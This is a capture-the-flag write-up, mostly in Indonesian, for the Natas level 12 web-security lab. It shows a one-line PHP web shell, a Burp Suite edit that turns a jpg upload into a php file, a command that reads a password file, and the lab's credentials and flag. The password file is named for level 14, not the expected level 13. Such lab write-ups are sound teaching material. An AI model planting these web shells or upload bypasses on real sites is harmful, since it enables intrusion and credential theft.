write up ctf by ariafatah

ariaf.my.id/ctf_aria/natas/level 12.html

soal

Username: natas12
URL: http://natas12.natas.labs.overthewire.org

solve

  • login with cred natas12:yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB
  • lalu disini ada sebuah form gambar jpg yang kalo kita lihat dari codenya namaa file tersebut akan dibuat secara acak dengan format jpeg alt text
  • jadi saya mencoba membuat backdoor php 
    cat simple.php 
<?php echo system($_GET['c']); ?>
  • dan mencoba menguploadnya dan ketika saya coba benar saja filenya diganti menjadi extension jpeg dengan nama acak
  • dan untungnya ketika saya cek di burp suite tidak terdapat encrypt apapun jadi saya mengubahnya alt text alt text
  • namun pas di forward hanya extensionnya saja namun tidak apa apa karena kita cuma butuh extensionya alt text
  • dan ketika saya coba buka filenya dengan urlnya saya sudah mendapatkan RCE alt text
  • dan saya hanya perlu mendapatkan file passnya alt text
    • ?c=cat /etc/natas_webpass/natas14

flag

trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC